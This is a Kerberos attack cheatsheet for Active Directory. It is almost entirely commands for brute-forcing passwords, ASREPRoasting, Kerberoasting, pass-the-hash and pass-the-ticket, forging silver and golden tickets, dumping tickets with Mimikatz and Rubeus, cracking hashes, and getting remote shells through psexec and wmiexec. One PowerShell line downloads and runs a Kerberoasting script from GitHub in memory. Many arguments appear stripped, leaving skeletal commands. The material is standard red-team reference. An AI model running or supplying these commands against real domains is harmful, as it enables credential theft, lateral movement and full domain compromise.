Kerberos cheatsheet
Bruteforcing
With kerbrute.py:
python kerbrute.py -domain -users -passwords -outputfile
With Rubeus version with brute module:
# with a list of users
.\Rubeus.exe brute /users: /passwords: /domain: /outfile:
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords: /outfile:
ASREPRoast
With Impacket example GetNPUsers.py:
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py /: -request -format -outputfile
# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py / -usersfile -format -outputfile
With Rubeus:
# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast /format: /outfile:
Cracking with dictionary of passwords:
hashcat -m 18200 -a 0
john --wordlist=
Kerberoasting
With Impacket example GetUserSPNs.py:
python GetUserSPNs.py /: -outputfile
With Rubeus:
.\Rubeus.exe kerberoast /outfile:
With Powershell:
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
Cracking with dictionary of passwords:
hashcat -m 13100 --force
john --format=krb5tgs --wordlist=
Overpass The Hash/Pass The Key (PTK)
By using Impacket examples:
# Request the TGT with hash
python getTGT.py / -hashes [lm_hash]:
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py / -aesKey
# Request the TGT with password
python getTGT.py /:[password]
# If not provided, password is asked
# Set the TGT for impacket use
export KRB5CCNAME=
# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass
# Ask and inject the ticket
.\Rubeus.exe asktgt /domain: /user: /rc4: /ptt
# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\ cmd
Pass The Ticket (PTT)
Harvest tickets from Linux
Check type and location of tickets:
grep default_ccache_name /etc/krb5.conf
If none return, default is FILE:/tmp/krb5cc_%{uid}.
In case of file tickets, you can copy-paste (if you have permissions) for use them.
In case of being KEYRING tickets, you can use tickey to get them:
# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -i
Harvest tickets from Windows
With Mimikatz:
mimikatz # sekurlsa::tickets /export
With Rubeus in Powershell:
.\Rubeus dump
# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String(""))
To convert tickets between Linux/Windows format with ticket_converter.py:
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
Using ticket in Linux:
With Impacket examples:
# Set the ticket for impacket use
export KRB5CCNAME=
# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass
Using ticket in Windows
Inject ticket with Mimikatz:
mimikatz # kerberos::ptt
Inject ticket with Rubeus:
.\Rubeus.exe ptt /ticket:
Execute a cmd in the remote machine with PsExec:
.\PsExec.exe -accepteula \\ cmd
Silver ticket
With Impacket examples:
# To generate the TGS with NTLM
python ticketer.py -nthash -domain-sid -domain -spn
# To generate the TGS with AES key
python ticketer.py -aesKey -domain-sid -domain -spn
# Set the ticket for impacket use
export KRB5CCNAME=
# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass
With Mimikatz:
# To generate the TGS with NTLM
mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target:
# To generate the TGS with AES 128 key
mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target:
# To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target:
# Inject TGS with Mimikatz
mimikatz # kerberos::ptt
Inject ticket with Rubeus:
.\Rubeus.exe ptt /ticket:
Execute a cmd in the remote machine with PsExec:
.\PsExec.exe -accepteula \\ cmd
Golden ticket
With Impacket examples:
# To generate the TGT with NTLM
python ticketer.py -nthash -domain-sid -domain
# To generate the TGT with AES key
python ticketer.py -aesKey -domain-sid -domain
# Set the ticket for impacket use
export KRB5CCNAME=
# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass
With Mimikatz:
# To generate the TGT with NTLM
mimikatz # kerberos::golden /domain:/sid: /rc4: /user:
# To generate the TGT with AES 128 key
mimikatz # kerberos::golden /domain:/sid: /aes128: /user:
# To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:/sid: /aes256: /user:
# Inject TGT with Mimikatz
mimikatz # kerberos::ptt
Inject ticket with Rubeus:
.\Rubeus.exe ptt /ticket:
Execute a cmd in the remote machine with PsExec:
.\PsExec.exe -accepteula \\ cmd
Misc
To get NTLM from password:
python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'
Tools
- Impacket
- Mimikatz
- Rubeus
- Rubeus with brute module
- PsExec
- kerbrute.py
- tickey
- ticket_converter.py